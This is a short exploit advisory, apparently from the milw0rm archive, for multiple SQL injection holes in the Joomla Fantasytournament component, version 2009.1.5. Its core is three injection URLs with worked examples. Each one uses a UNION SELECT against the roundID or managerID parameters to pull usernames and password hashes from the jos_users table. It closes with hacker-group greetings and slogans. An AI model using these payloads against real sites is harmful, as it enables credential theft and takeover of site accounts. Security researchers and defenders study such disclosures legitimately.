############################################################################# # # # Joomla Component Fantasytournament Multiple SQL Injection Vulnerabilities # # # ############################################################################# ######################################## [~] Vulnerability found by: H!tm@N [~] Contact: khghitman[at]gmail[dot]com [~] Site: www.khg-crew.ws [~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-] ######################################## [~] ScriptName: "Joomla" [~] Component: "Fantasytournament (com_fantasytournament)" [~] Version: "2009.1.5" [~] Date: "01/01/2009" [~] Author: "Adrian Gray" [~] Author E-mail: "a.gray@javalamp.co.uk" [~] Author URL: "www.graymoose.com" [~] Component info: "http://extensions.joomla.org/extensions/sports-&-games/sports/1604/details" ######################################## [~] Exploit 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=[SQL] [~] Example 1: /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6+from+jos_users-- ######################################## [~] Exploit 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=[SQL] [~] Example 2: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=63&managerTeamName=pacman&roundID=-1+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users-- ######################################## [~] Exploit 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=[SQL] [~] Example 3: /index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users-- ######################################## [~] Proud 2 be Albanian [~] Proud 2 be Muslim [~] United States of Albania ######################################## # milw0rm.com [2009-01-14]